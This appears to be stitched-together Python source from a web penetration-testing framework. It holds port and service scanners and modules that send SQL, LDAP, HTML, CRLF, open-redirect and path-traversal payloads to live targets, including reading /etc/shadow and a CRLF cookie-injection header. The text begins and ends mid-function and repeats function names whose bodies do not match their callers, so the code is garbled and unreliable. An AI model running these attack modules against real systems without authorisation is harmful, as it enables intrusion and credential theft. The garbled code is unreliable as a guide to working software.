"No payload succeeded.")
except Exception as e: # if error
print(R + ' [-] Unexpected Exception Encountered!')
print(R + ' [-] Exception : ' + str(e))
print(G + '\n [+] PHPi Module Completed!')
def scan0x00(host):
#print(R+'\n =========================')
#print(R+' P O R T S C A N N E R')
#print(R+' =========================\n')
from core.methods.print import pscan
pscan("port scanner")
print(GR + ' [*] Using most common ports...')
ports = [
20, 21, 23, 25, 53, 67, 68, 69, 80, 109, 110, 111, 123, 137, 143, 156,
161, 162, 179, 389, 443, 445, 512, 513, 546, 547, 636, 993, 995, 1099,
2121, 2049, 3306, 5432, 5900, 6000, 6667, 8080, 8180, 8443, 10000
]
mlprts = listsplit(ports, round(len(ports) / processes))
#print(mlprts)
print(C + ' [+] Scanning %s ports...' % len(ports))
try:
ip = socket.gethostbyname(host)
print(G + '\n [+] Target server detected up and running...' + C +
color.TR2 + C)
print(O + ' [*] Preparing for scan...' + C)
pass
except Exception:
print(R + ' [-] Server not responding...')
time.sleep(0.3)
print(R + ' [*] Exiting...')
quit()
open_ports = []
closed_ports = []
print(G + " [*] Scanning started at %s" % (time.strftime("%I:%M:%S %p")) +
C + color.TR2 + C)
starting_time = time.time()
try:
print(O + " [*] Scan in progress.." + C)
time.sleep(0.8)
with Pool(processes=processes) as pool:
res = [
pool.apply_async(portloop, args=(
l,
host,
)) for l in mlprts
]
#res1 = pool.apply_async(portloop, )
for i in res:
j = i.get()
open_ports += j[0]
closed_ports += j[1]
print(G + "\n [+] Scanning completed at %s" %
(time.strftime("%I:%M:%S %p")) + C + color.TR2 + C)
ending_time = time.time()
total_time = ending_time - starting_time
print(P + ' [*] Preparing report...\n' + C)
time.sleep(1)
openports = " {}{}{}{}{}{}{}{} ports open.".format(
color.TR5, C, G, str(len(open_ports)), color.END, color.TR2,
color.END, color.CURSIVE)
summary("simpleport", openports)
print()
print(P + ' +--------+----------+')
print(P + ' | ' + C + 'PORT' + P + ' ' + '| ' + C + 'STATE' + P +
' ' + '|')
print(P + ' +--------+----------+')
lvl2 = "getports"
module = "ScanANDEnum"
lvl1 = "Scanning & Enumeration"
lvl3 = ""
if open_ports:
for i in sorted(open_ports):
c = str(i)
if len(c) == 1:
print(P + ' | ' + C + c + P + ' | ' + C +
'OPEN' + P + ' ' + '|')
print(P + ' +--------+----------+')
time.sleep(0.2)
elif len(c) == 2:
print(P + ' | ' + C + c + P + ' ' + P + '| ' + C +
'OPEN' + P + ' ' + '| ')
print(P + ' +--------+----------+')
time.sleep(0.2)
elif len(c) == 3:
print(P + ' | ' + C + c + P + ' ' + '| ' + C +
'OPEN' + P + ' ' + '| ')
print(P + ' +--------+----------+')
time.sleep(0.2)
elif len(c) == 4:
print(P + ' | ' + C + c + P + ' ' + '| ' + C +
'OPEN' + P + ' ' + '| ')
print(P + ' +--------+----------+')
time.sleep(0.2)
elif len(c) == 5:
print(P + ' | ' + C + c + P + ' ' + '| ' + C +
'OPEN' + P + ' ' + '| ')
print(P + ' +--------+----------+')
time.sleep(0.2)
data = "Open Ports: " + str(open_ports)
save_data(database, module, lvl1, lvl2, lvl3, name, data)
else:
save_data(database, module, lvl1, lvl2, lvl3, name,
"No open ports found.")
print(R + "\n [-] No open ports found.!!\n")
print(B + '\n [!] ' + str(len(closed_ports)) +
' closed ports not shown')
print(G + " [+] Host %s scanned in %s seconds" % (host, total_time) +
C + color.TR2 + C + "\n")
except KeyboardInterrupt:
print(R + "\n [-] User requested shutdown... ")
print(' [-] Exiting...\n')
quit()
def openredirect(web):
global name
name = targetname(web)
global lvl2
lvl2 = inspect.stack()[0][3]
global module
module = "VulnAnalysis"
global lvl1
lvl1 = "Critical Vulnerabilities"
global lvl3
lvl3 = ""
time.sleep(0.6)
#print(R+'\n ===========================================')
#print(R+'\n O P E N R E D I R E C T C H E C K E R')
#print(R+' ---<>----<>----<>----<>----<>----<>----<>--\n')
from core.methods.print import pvln
pvln("open redirect checker")
try:
if properties["PARAM"][1] == " ":
param = input(
O +
' [§] Scope parameter to test (eg. /redirect.php?site=foo) :> '
)
else:
param = properties["PARAM"][1]
if '?' in param and '=' in param:
if param.startswith('/'):
m = input(
GR +
'\n [!] Your path starts with "/".\n [§] Do you mean root directory? (Y/n) :> '
)
if m == 'y':
web00 = web + param
elif m == 'n':
web00 = web + param
else:
print(R + ' [-] U mad?')
else:
web00 = web + '/' + param
else:
print(R + ' [-] Your input does not match a parameter...')
param = input(O + ' [§] Enter paramter to test :> ')
if properties["PARALLEL"][1] == " ":
pa = input(" [?] Parallel Attack? (enter if not) :> ")
parallel = pa != ""
else:
parallel = properties["PARALLEL"][1] == "1"
print(GR + ' [*] Configuring relative headers...')
time.sleep(0.8)
gen_headers = {
'User-Agent':
'Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:2.2) Gecko/20110201',
'Accept-Language': 'en-US;',
'Accept-Encoding': 'gzip, deflate',
'Accept': 'text/html,application/xhtml+xml,application/xml;',
'Connection': 'close'
}
if properties["DICT"][1] == " ":
print(O + ' [!] Enter path to payload file ' + R +
'(Default: files/payload-db/openredirect_payloads.lst)')
fi = input(O + ' [§] Your input (Press Enter if default) :> ')
elif properties["DICT"][1].lower() == "none":
fi = ""
else:
fi = properties["DICT"][1]
if fi == '':
fi = 'files/payload-db/openredirect_payloads.lst'
getPayloads0x00(fi)
else:
if os.path.exists(fi) == True:
print(G + ' [+] File found under ' + fi)
getPayloads0x00(fi)
else:
print(R + ' [-] File not found... Using default payload...')
fi = 'files/payload-db/openredirect_payloads.lst'
getPayloads0x00(fi)
if properties["COOKIE"][1] == " ":
input_cookie = input(
"\n [§] Got any cookies? [just enter if none] :> ")
elif properties["COOKIE"][1].lower() == "none":
input_cookie = ""
else:
input_cookie = properties["COOKIE"][1]
if (len(input_cookie) > 0):
gen_headers['Cookie'] = input_cookie
print(GR + ' [*] Configuring payloads with Url...')
success = []
if not parallel:
success += check0x00(web00, gen_headers, payloads)
else:
paylists = listsplit(payloads, round(len(payloads) / processes))
with Pool(processes=processes) as pool:
res = [
pool.apply_async(check0x00, args=(
web00,
gen_headers,
l,
)) for l in paylists
]
for y in res:
i = y.get()
success += i
if success:
data = "Open Redirect Vulnerability found!\nVulnerable param: " + web00 + "\nPayloads: " + str(
success)
save_data(database, module, lvl1, lvl2, lvl3, name, data)
print(
" [+] Open Redirect Vulnerability found! Successful payloads:")
for i in success:
print(i)
else:
print(R + "\n [-] No payload succeeded." + C)
save_data(database, module, lvl1, lvl2, lvl3, name,
"No payload succeeded.")
except KeyboardInterrupt:
print(R + ' [-] User Interruption Detected!')
pass
def check0x00(website0, gen_headers, parallel):
#print(query)
#print(siteinput)
loggy = []
enviro = []
fud = []
generic = []
cnfy = []
gotcha = []
if properties["EVASION"][1] == " ":
ev = input(
C +
"\n [?] Perform Evasion Attack? (specific file ; enter for no) :> "
)
evasion = ev != ""
else:
evasion = properties["EVASION"][1] == "1"
if not evasion:
if properties["DICT"][1] == " ":
print(C + ' [!] Enter the filename containing paths ' + O +
'(Default: files/pathtrav_paths.lst)' + C)
fi = input(C +
" [*] Custom filepath (press Enter for default) :> ")
elif properties["DICT"][1].lower() == "none":
fi = ""
else:
fi = properties["DICT"][1]
if fi == '':
print(GR + ' [*] Using default filepath...')
fi = getFile0x00('files/fuzz-db/pathtrav_paths.lst')
else:
fi = getFile0x00(fi)
filepath = ""
else:
fi = getFile0x00('files/fuzz-db/pathtrav_evasion.lst')
if properties["FILE"][1] == " ":
filepath = input(
" [!] Enter file and path to search (Default: etc/shadow) :> ")
elif properties["FILE"][1].lower() == "none":
filepath = ""
else:
filepath = properties["FILE"][1]
if (active0 is False):
owebsite = website0
else:
#owebsite = ahurl
owebsite = website0
print("")
requests = session()
if not parallel:
for line in open(fi):
paths = atck(evasion, filepath, owebsite, line, requests)
gotcha += paths[0]
generic += paths[1]
loggy += paths[2]
enviro += paths[3]
fud += paths[4]
cnfy += paths[5]
else:
pathlist = file2list(fi)
pthlst = listsplit(pathlist, round(len(pathlist) / processes))
with Pool(processes=processes) as pool:
res = [
pool.apply_async(atckpre,
args=(
evasion,
filepath,
owebsite,
l,
requests,
)) for l in pthlst
]
#res1 = pool.apply_async(portloop, )
for i in res:
paths = i.get()
gotcha += paths[0]
generic += paths[1]
loggy += paths[2]
enviro += paths[3]
fud += paths[4]
cnfy += paths[5]
#print(G+"\n [+] Retrieved %s interesting paths..." % str(len(gotcha))+C+"\n")
#print("\n{}———————{}·‹› {}Pathtrav: {}{} int. paths{} ‹›·{}———————{}\n".format(color.END,C,O,G,str(len(gotcha)),C,color.END,C))
foundpaths = " {}{}{}{}{}{}{}{} paths leaked.".format(
color.TR5, C, G, str(len(gotcha)), color.END, color.TR2, color.END,
color.CURSIVE)
summary("pathtrav", foundpaths)
time.sleep(0.5)
if len(loggy) > 0:
printOut0x00("Logs", loggy)
if len(enviro) > 0:
printOut0x00("/proc/self/environ", enviro)
if len(fud) > 0:
printOut0x00("/proc/self/fd", fud)
if len(cnfy) > 0:
printOut0x00("Configuration", cnfy)
if len(generic) > 0:
printOut0x00("Diverse", generic)
def ldap(web):
print(GR + ' [*] Loading module...')
time.sleep(0.5)
#print(R+'\n =============================')
#print(R+'\n L D A P I N J E C T I O N')
#print(R+' ——·‹›·––·‹›·——·‹›·——·‹›·––·‹›\n')
from core.methods.print import pvln
pvln("ldap Injection")
try:
if properties["PARAM"][1] == " ":
web0 = input(
O + ' [§] Parameter path to test (eg. /lmao.php?foo=bar) :> ')
else:
web0 = properties["PARAM"][1]
if "?" in web0 and '=' in web0:
if web0.startswith('/'):
m = input(
GR +
'\n [!] Your path starts with "/".\n [§] Do you mean root directory? (Y/n) :> '
)
if m.lower() == 'y':
web00 = web + web0
elif m.lower() == 'n':
web00 = web + web0
else:
print(R + ' [-] U mad?')
else:
web00 = web + '/' + web0
else:
sys.exit(R + " [-] Invalid parameters." + C)
print(B + ' [+] Parameterised Url : ' + C + web00)
if properties["PARALLEL"][1] == " ":
pa = input(" [?] Parallel Attack? (enter if not) :> ")
parallel = pa is not ""
else:
parallel = properties["PARALLEL"][1] == "1"
if properties["COOKIE"][1] == " ":
input_cookie = input(
"\n [*] Enter cookies if needed (Enter if none) :> ")
elif properties["COOKIE"][1].lower() == "none":
input_cookie = ""
else:
input_cookie = properties["COOKIE"][1]
print(GR + ' [*] Setting headers...')
time.sleep(0.6)
gen_headers = {
'User-Agent':
'Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:2.2) Gecko/20110201',
'Accept-Language': 'en-US;',
'Accept-Encoding': 'gzip, deflate',
'Accept': 'text/html,application/xhtml+xml,application/xml;',
'Connection': 'close'
}
if (len(input_cookie) > 0):
gen_headers['Cookie'] = input_cookie
if properties["DICT"][1] == " ":
print(O + ' [§] Enter the payloads file ' + R +
'(Default: files/payload-db/ldap_payloads.lst)...')
fi = input(O + ' [§] Your input (Press Enter for default) :> ')
elif properties["DICT"][1].lower() == "none":
fi = ""
else:
fi = properties["DICT"][1]
if fi == '':
fi = 'files/payload-db/ldap_payloads.lst'
getFile0x00(fi)
else:
if os.path.exists(fi) == True:
print(G + ' [+] File under ' + fi + ' found!')
getFile0x00(fi)
else:
print(R + ' [-] Invalid input... Using default...')
fi = 'files/payload-db/ldap_payloads.lst'
getFile0x00(fi)
print(O + ' [!] Parsing url...')
time.sleep(0.7)
web000 = web00.split('=')[0] + '='
print(GR + ' [*] Starting enumeration...')
time.sleep(0.7)
success = []
if not parallel:
success += check0x00(web000, gen_headers, payloads)
else:
paylists = listsplit(payloads, round(len(payloads) / processes))
with Pool(processes=processes) as pool:
res = [
pool.apply_async(check0x00,
args=(
web000,
gen_headers,
l,
)) for l in paylists
]
for y in res:
i = y.get()
success += i
if success:
print(" [+] LDAPi Vulnerability found! Successful payloads:")
for i in success:
print(i)
else:
print(R + "\n [-] No payload succeeded." + C)
except KeyboardInterrupt:
print(R + ' [-] Aborting module...')
pass
except Exception as e:
print(R + ' [-] Exception : ' + str(e))
print(G + '\n [+] LDAP Injection module completed!\n')
def check0x00(website0, gen_headers, parallel):
#print(query)
#print(siteinput)
loggy = []
enviro = []
fud = []
generic = []
cnfy = []
gotcha = []
if properties["EVASION"][1] == " ":
ev = input(
O +
"\n [?] Perform Evasion Attack? (specific file ; enter for no) :> "
)
evasion = ev != ""
else:
evasion = properties["EVASION"][1] == "1"
if not evasion:
if properties["DICT"][1] == " ":
print(O + ' [!] Enter the filename containing paths ' + R +
'(Default: files/pathtrav_paths.lst)')
fi = input(O +
" [*] Custom filepath (press Enter for default) :> ")
elif properties["DICT"][1].lower() == "none":
fi = ""
else:
fi = properties["DICT"][1]
if fi == '':
print(GR + ' [*] Using default filepath...')
fi = getFile0x00('files/fuzz-db/pathtrav_paths.lst')
else:
fi = getFile0x00(fi)
filepath = ""
else:
fi = getFile0x00('files/fuzz-db/pathtrav_evasion.lst')
if properties["FILE"][1] == " ":
filepath = input(
" [!] Enter file and path to search (Default: etc/shadow) :> ")
elif properties["FILE"][1].lower() == "none":
filepath = ""
else:
filepath = properties["FILE"][1]
if (active0 is False):
owebsite = website0
else:
#owebsite = ahurl
owebsite = website0
print("")
if not parallel:
for line in open(fi):
paths = atck(evasion, filepath, owebsite, line)
gotcha += paths[0]
generic += paths[1]
loggy += paths[2]
enviro += paths[3]
fud += paths[4]
cnfy += paths[5]
else:
pathlist = file2list(fi)
pthlst = listsplit(pathlist, round(len(pathlist) / processes))
with Pool(processes=processes) as pool:
res = [
pool.apply_async(atckpre,
args=(
evasion,
filepath,
owebsite,
l,
)) for l in pthlst
]
#res1 = pool.apply_async(portloop, )
for i in res:
paths = i.get()
gotcha += paths[0]
generic += paths[1]
loggy += paths[2]
enviro += paths[3]
fud += paths[4]
cnfy += paths[5]
print(G + "\n [+] Retrieved %s interesting paths...\n" % str(len(gotcha)))
time.sleep(0.5)
printOut0x00("Logs", loggy)
printOut0x00("/proc/self/environ", enviro)
printOut0x00("/proc/self/fd", fud)
printOut0x00("Configuration", cnfy)
printOut0x00("Generic", generic)
def htmli(web):
print(GR+' [*] Loading module...')
time.sleep(0.5)
#print(R+'\n =============================')
#print(R+'\n H T M L I N J E C T I O N')
#print(R+' ——·‹›·––·‹›·——·‹›·––·‹›·–—·‹›\n')
from core.methods.print import pvln
pvln("html injection")
gen_headers = {'User-Agent':'Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:2.2) Gecko/20110201',
'Accept-Language':'en-US;',
'Accept-Encoding': 'gzip, deflate',
'Accept': 'text/html,application/xhtml+xml,application/xml;',
'Connection':'close'}
print(GR+' [*] Initiating '+R+'Parameter Based Check...')
param = input(O+' [#] Scope parameter (eg. /vuln/page.php?q=lmao) :> ')
if param.startswith('/') == False:
param = '/' + param
choice = ""
if "&" in param:
ln = len(param.split("&"))
choice = input(" [!] Discovered {} parameters. Which one to use? (enter name) :> ".format(ln))
if not choice in param:
sys.exit(" [-] Param {} not found.".format(choice))
bug2 = ""
if choice != "":
n = param.split(choice + "=")[1]
if "&" in n:
bug2 = param.split(choice)[1]
tmp = bug2.split("&")[0]
bug2 = bug2.replace(tmp,"")
pa = input("\n [?] Parallelise Attack? (enter if not) :> ")
parallel = pa is not ""
e = getFile0x00()
web00 = web + param.split(choice + '=')[0] + choice + '='
try:
success = []
if not parallel:
for pay in payloads:
print(GR+'\n [*] Setting parameters...')
web0x00 = web00 + pay + bug2
print(C+' [+] Using payload : '+B+str(pay))
print(B+' [+] Using !nfected Url : '+GR+str(web0x00)) # display whats going on
success += check0x00(web0x00, pay, gen_headers) # check the outupt of the fuzz
else:
paylists = listsplit(payloads, round(len(payloads)/processes))
with Pool(processes=processes) as pool:
res = [pool.apply_async(checkpre, args=(l, web00, bug2, gen_headers,)) for l in paylists]
for y in res:
i = y.get()
success += i
if success:
print(" [+] HTMLi Vulnerability found! Successful payloads:")
for i in success:
print(i)
else:
print(R + "\n [-] No payload succeeded."+C)
except Exception as e:
print(R+' [-] Unexpected Exception Encountered!')
print(R+' [-] Exception : '+str(e))
print(G+'\n [+] HTMLi Module Completed!')
def manual0x00(web, parallel, properties):
#print(R+'\n ========================')
print(R + '\n S Q L i (Manual Mode)')
print(R + ' ---<>----<>----<>----<>-\n')
requests = session()
if properties["PARAM"][1] == " ":
bug = input(O + ' [§] Injectable Endpoint ' + R +
'(eg. /sqli/fetch.php?id=2)' + O + ' :> ')
else:
bug = properties["PARAM"][1]
bugs = web + bug
getrq = requests.get(bugs, timeout=7, verify=False)
choice = ""
if "&" in bug:
ln = len(bug.split("&"))
choice = input(
" [!] Discovered {} parameters. Which one to use? (enter name) :> "
.format(ln))
if not choice in bug:
sys.exit(" [-] Param {} not found.".format(choice))
bug2 = ""
param1 = ""
if choice != "":
n = bug.split(choice + "=")[1]
if "&" in n:
bug2 = bug.split(choice + "=")[1]
param1 = bug2.split("&")[0]
bug2 = bug2.replace(param1, "")
bugs = web + bug.split(choice + '=')[0] + choice + '=' + param1
print(O + ' [!] Using Url : ' + GR + bugs)
if '?' in str(bugs) and '=' in str(bugs):
success = []
if not parallel:
for p in pay:
bugged = bugs + str(p) + bug2
print(B + " [*] Trying : " + C + bugged)
sleep(0.7)
response = requests.get(bugged)
if len(response.content) != len(getrq.content):
print('\n' + G + ' [+] Vulnerable link detected : ' + bugs)
print(GR + ' [*] Injecting payloads...')
print(B + ' [!] PoC : ' + str(bugged))
print(R + " [!] Payload : " + O + p + '\033[0m')
print("\033[1m [!] Code Snippet :\n \033[0m" +
str(response) + '\n')
success.append(p)
else:
paylists = listsplit(pay, round(len(pay) / processes))
with Pool(processes=processes) as pool:
res = [
pool.apply_async(manualpre, args=(
bugs,
bug2,
l,
getrq,
)) for l in paylists
]
#res1 = pool.apply_async(portloop, )
for i in res:
j = i.get()
success += j
if success:
data = "SQLi Vulnerability found!\nVulnerable Link: " + bugs + "\nSuccessful payloads: " + str(
success)
save_data(database, module, lvl1, lvl2, lvl3, name, data)
print(" [+] SQLi Vulnerability found! Successful payloads:")
for i in success:
print(i)
else:
save_data(database, module, lvl1, lvl2, lvl3, name,
"(manual) no payload succeeded.")
print(R + "\n [-] No payload succeeded." + C)
else:
print(R + ' [-] Enter an URL with scope parameter...')
manual0x00(web, parallel, properties)
def crlf(web):
global name
name = targetname(web)
global lvl2
lvl2 = inspect.stack()[0][3]
global module
module = "VulnAnalysis"
global lvl1
lvl1 = "Critical Vulnerabilities"
global lvl3
lvl3 = ""
time.sleep(0.5)
#print(R+'\n =============================')
#print(R+'\n C R L F I N J E C T I O N')
#print(R+' ---<>----<>----<>----<>----<>\n')
from core.methods.print import pvln
pvln("CRLF Injection")
gen_headers = {
'User-Agent':
'Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:2.2) Gecko/20110201',
'Accept-Language': 'en-US;',
'Accept-Encoding': 'gzip, deflate',
'Accept': 'text/html,application/xhtml+xml,application/xml;',
'Connection': 'close'
}
inf_headers = {
'User-Agent':
'Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:2.2) Gecko/20110201%0d%0aSet-Cookie: Infected_by=Drake',
'Accept-Language': 'en-US;',
'Accept-Encoding': 'gzip, deflate',
'Accept': 'text/html,application/xhtml+xml,application/xml;',
'Connection': 'close'
}
print(GR + ' [*] Testing response to normal requests...')
time.sleep(0.5)
print(O + ' [*] Setting header values...')
time.sleep(0.7)
print(O + ' [*] Initiating ' + R + 'User-Agent Based Check...')
time.sleep(0.5)
print(B + ' [+] Injecting CRLF in User-Agent Based value : ' + C +
'%0d%0a ...')
time.sleep(0.7)
print(O + ' [*] Using !nfected UA Value : ' + inf_headers['User-Agent'])
m = getHeaders0x00(web, inf_headers)
success = []
success += check0x00(
m,
'Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:2.2) Gecko/20110201%0d%0aSet-Cookie: Infected_by=Drake'
)
print(GR + ' [*] Initiating ' + R + 'Parameter Based Check...')
if properties["PARAM"][1] == " ":
param = input(O +
' [§] Scope parameter (eg. /vuln/page.php?crlf=x) :> ')
else:
param = properties["PARAM"][1]
if not param.startswith('/'):
param = '/' + param
if properties["PARALLEL"][1] == " ":
pa = input("\n [?] Parallelise Attack? (enter if not) :> ")
parallel = pa != ""
else:
parallel = properties["PARALLEL"][1] == "1"
e = getFile0x00()
web0 = web + param
web00 = web0.split('=')[0] + '='
try:
if not parallel:
for pay in payloads:
web0x00 = web00 + pay
print(C + ' [+] Using payload : ' + B + str(pay))
print(B + ' [+] Using !nfected Url : ' + GR + str(web0x00))
p = getHeaders0x00(web0x00, gen_headers)
success += check0x00(p, pay)
else:
paylists = listsplit(payloads, round(len(payloads) / processes))
with Pool(processes=processes) as pool:
res = [
pool.apply_async(checkpre, args=(
l,
web00,
gen_headers,
)) for l in paylists
]
for y in res:
i = y.get()
success += i
if success:
data = "CRLF Injection Vulnerability found!\nVulnerable param: " + web00 + "\nPayloads: " + str(
success)
save_data(database, module, lvl1, lvl2, lvl3, name, data)
print(
" [+] CRLF Injection Vulnerability found! Successful payloads:"
)
for i in success:
print(i)
else:
print(R + "\n [-] No payload succeeded." + C)
save_data(database, module, lvl1, lvl2, lvl3, name,
"No payload succeeded.")
except Exception as e:
print(R + ' [-] Unexpected Exception Encountered!')
print(R + ' [-] Exception : ' + str(e))
print(G + ' [+] CRLF Module Completed!')
def sqlicookie0x00(web, parallel):
#print(R+'\n =========================')
print(R + '\n S Q L i (Cookie Based)')
print(R + ' ---<>----<>----<>----<>--\n')
sleep(0.5)
vsession = session()
req = vsession.get(web)
if vsession.cookies:
print(G + ' [+] This website supports session cookies...')
success = []
if not parallel:
for i in pay:
print(B + " [*] Trying Payload : " + C + '' + i)
time.sleep(0.7)
for cookie in vsession.cookies:
cookie.value += i
print(O + ' [+] Using ' + R + '!nfected' + O +
' cookie : ' + GR + cookie.value)
r = vsession.get(web)
if len(r.content) != len(req.content):
poc = C + " [+] PoC : " + O + cookie.name + " : " + GR + cookie.value
print(
G +
" [+] Blind Based SQli (Cookie Based) Detected! "
)
print(poc)
print(P + ' [+] Code : ' + W + str(r.text) + '\n')
success.append(i)
else:
paylists = listsplit(pay, round(len(pay) / processes))
with Pool(processes=processes) as pool:
res = [
pool.apply_async(cookiepre,
args=(
vsession,
web,
l,
req,
)) for l in paylists
]
#res1 = pool.apply_async(portloop, )
for i in res:
j = i.get()
success += j
if success:
data = "SQLi Vulnerability (Cookie) found!\nSuccessful payloads: " + str(
success)
save_data(database, module, lvl1, lvl2, lvl3, name, data)
print(
" [+] SQLi Vulnerability (Cookie) found! Successful payloads:"
)
for i in success:
print(i)
else:
print(R + "\n [-] No payload succeeded." + C)
save_data(database, module, lvl1, lvl2, lvl3, name,
"(cookie) no payload succeeded.")
else:
print(R + ' [-] No support for cookies...')
time.sleep(0.5)
print(R + ' [-] Cookie based injection not possible...')
data = "No support for cookies. Cookie based injection not possible."
save_data(database, module, lvl1, lvl2, lvl3, name, data)
def service0x00(host):
#print(R+'\n ===================================')
#print(R + " S E R V I C E D E T E C T I O N")
#print(R + ' ===================================\n')
from core.methods.print import pscan
pscan("service detection")
if properties["INIT"][1] == " ":
start_port = input(C+' [§] Enter initial port :> ')
else:
start_port = properties["INIT"][1]
if properties["FIN"][1] == " ":
end_port = input(C+' [§] Enter ending port :> ')
else:
end_port = properties["FIN"][1]
start_port = int(start_port)
end_port = int(end_port)
open_ports = []
closed_ports = []
try:
ip = socket.gethostbyname(host)
print(G+'\n [+] Target server detected up and running...'+C+color.TR2+C)
print(O+' [*] Preparing for scan...'+C)
pass
except Exception:
print(R+' [-] Server not responding...')
time.sleep(0.3)
print(R+' [*] Exiting...')
quit()
if properties["VERBOSE"][1] == " ":
mn = input(C+'\n [?] Do you want a verbose output (enter if not) :> ')
verbose = mn != ""
else:
verbose = properties["VERBOSE"][1] == "1"
if verbose:
print(''+P+'\n [+] Verbose mode selected !\n')
print(GR+" [!] Scanning %s from port %s - %s: " % (host, start_port, end_port))
print(G+" [*] Scanning started at %s" %(time.strftime("%I:%M:%S %p"))+C+color.TR2+C)
starting_time = time.time()
try:
if verbose:
print(O+" [*] Scan in progress.."+C)
time.sleep(0.8)
portrange = range(start_port, end_port+1)
prtlst = listsplit(portrange, round(len(portrange)/processes))
with Pool(processes=processes) as pool:
res = [pool.apply_async(portloop, args=(l,host,verbose,)) for l in prtlst]
#res1 = pool.apply_async(portloop, )
for i in res:
j = i.get()
open_ports += j[0]
closed_ports += j[1]
print(G+"\n [+] Scanning completed at %s" %(time.strftime("%I:%M:%S %p"))+C+color.TR2+C)
ending_time = time.time()
total_time = ending_time - starting_time
print(P+' [*] Preparing report...\n'+C)
time.sleep(1)
openports = " {}{}{}{}{}{}{}{} ports open.".format(color.TR5,C, G, str(len(open_ports)), color.END, color.TR2, color.END, color.CURSIVE)
summary("servicedetect", openports)
print()
print(P+' +--------+----------+-----------+')
print(P+' | '+C+'PORT '+P+'| '+C+'STATE '+P+'| '+C+'SERVICE '+P+'|')
print(P+' +--------+----------+-----------+')
if open_ports:
data = "Port:Service >>\n"
for i in sorted(open_ports):
service = get_servicev(i)
if not service:
service = "Unknown"
m = str(service)
c = str(i)
data = data + "\n" + c + ":" + m
if len(c) == 1:
print(P+' | '+C+c+P+' | '+C+'OPEN '+P+'| '+C+m+'')
print(P+' +--------+----------+-----------+')
time.sleep(0.2)
elif len(c) == 2:
print(P+' | '+C+c+' '+P+'| '+C+'OPEN '+P+'| '+C+m+'')
print(P+' +--------+----------+-----------+')
time.sleep(0.2)
elif len(c) == 3:
print(P+' | '+C+c+' '+P+'| '+C+'OPEN '+P+'| '+C+m+'')
print(P+' +--------+----------+-----------+')
time.sleep(0.2)
elif len(c) == 4:
print(P+' | '+C+c+' '+P+'| '+C+'OPEN '+P+'| '+C+m+'')
print(P+' +--------+----------+-----------+')
time.sleep(0.2)
elif len(c) == 5:
print(P+' | '+C+c+' '+P+'| '+C+'OPEN '+P+'| '+C+m+'')
print(P+' +--------+----------+-----------+')
time.sleep(0.2)
save_data(database, module, lvl1, lvl2, lvl3, name, data)
else:
save_data(database, module, lvl1, lvl2, lvl3, name, "No open ports found.")
print(R+"\n [-] No open ports found.!!\n")
print(B+'\n [!] ' + str(len(closed_ports)) + ' closed ports not shown')
print(G+" [+] Host %s scanned in %s seconds" %(host, total_time)+C+color.TR2+C+"\n")
except KeyboardInterrupt:
print(R+"\n [-] User requested shutdown... ")
print(' [-] Exiting...\n')
quit()
def scan0x00(target):
try:
#print(R+'\n =================================')
#print(R+' T C P C O N N E C T S C A N ')
#print(R+' =================================\n')
from core.methods.print import pscan
pscan("tcp connect scan")
if properties["INIT"][1] == " ":
min_port = input(C + ' [§] Enter initial port :> ')
else:
min_port = properties["INIT"][1]
if properties["FIN"][1] == " ":
max_port = input(C + ' [§] Enter ending port :> ')
else:
max_port = properties["FIN"][1]
open_ports = []
closed_ports = []
ip_host = socket.gethostbyname(target)
if properties["VERBOSE"][1] == " ":
chk = input(
C + ' [?] Do you want a verbose output? (enter if not) :> ')
verbose = chk is not ""
else:
verbose = properties["VERBOSE"][1] == "1"
print(GR + ' [*] Checking port range...')
if int(min_port) >= 0 and int(max_port) >= 0 and int(max_port) >= int(
min_port) and int(max_port) <= 65536:
print(P + ' [!] Port range detected valid...' + C)
time.sleep(0.3)
print(GR + ' [*] Preparing for the scan...')
ports = range(int(min_port),
int(max_port) +
1) # Build range from given port numbers
prtlst = listsplit(ports, round(len(ports) / processes))
starting_time = time.time() # Start clock for scan time
SYNACK = 0x12 # Set flag values for later reference
RSTACK = 0x14
checkhost(ip_host) # Run checkhost() function from earlier
print(G + " [!] Scanning initiated at " + strftime("%H:%M:%S") +
"!" + C + color.TR2 + C + "\n") # Confirm scan start
with Pool(processes=processes) as pool:
res = [
pool.apply_async(portloop, args=(
l,
verbose,
ip_host,
)) for l in prtlst
]
#res1 = pool.apply_async(portloop, )
for i in res:
j = i.get()
open_ports += j[0]
closed_ports += j[1]
print(G + "\n [!] Scanning completed at %s" %
(time.strftime("%I:%M:%S %p")) + C + color.TR2 + C)
ending_time = time.time()
total_time = ending_time - starting_time
print(P + ' [*] Preparing report...\n' + C)
time.sleep(1)
openports = " {}{}{}{}{}{}{}{} ports open.".format(
color.TR5, C, G, str(len(open_ports)), color.END, color.TR2,
color.END, color.CURSIVE)
summary("tcp connect", openports)
print()
print(P + ' +--------+------------------+')
print(P + ' | ' + GR + 'PORT ' + P + '| ' + C +
'STATE ' + P + '|')
print(P + ' +--------+------------------+')
if open_ports:
for i in sorted(open_ports):
c = str(i)
if len(c) == 1:
print(P + ' | ' + C + c + P + ' | ' + C +
'OPEN ' + P + '|')
print(P + ' +--------+------------------+')
time.sleep(0.2)
elif len(c) == 2:
print(P + ' | ' + C + c + ' ' + P + '| ' +
C + 'OPEN ' + P + '|')
print(P + ' +--------+------------------+')
time.sleep(0.2)
elif len(c) == 3:
print(P + ' | ' + C + c + ' ' + P + '| ' +
C + 'OPEN ' + P + '|')
print(P + ' +--------+------------------+')
time.sleep(0.2)
elif len(c) == 4:
print(P + ' | ' + C + c + ' ' + P + '| ' +
C + 'OPEN ' + P + '|')
print(P + ' +--------+------------------+')
time.sleep(0.2)
elif len(c) == 5:
print(P + ' | ' + C + c + ' ' + P + '| ' +
C + 'OPEN ' + P + '|')
print(P + ' +--------+------------------+')
time.sleep(0.2)
print('')
else:
print(R + ' [-] No open ports found!')
print(B + ' [!] ' + str(len(closed_ports)) +
' closed ports not shown')
print(G + " [+] Host %s scanned in %s seconds" %
(target, total_time) + C + color.TR2 + C + "\n")
else: # If range didn't raise error, but didn't meet criteria
print(R + "\n [!] Invalid Range of Ports")
print(" [!] Exiting...")
quit()
except Exception as e: # If input range raises an error
print(e)
quit()
def scan0x00(target):
try:
#print(R+'\n =================================')
#print(R+' T C P S T E A L T H S C A N ')
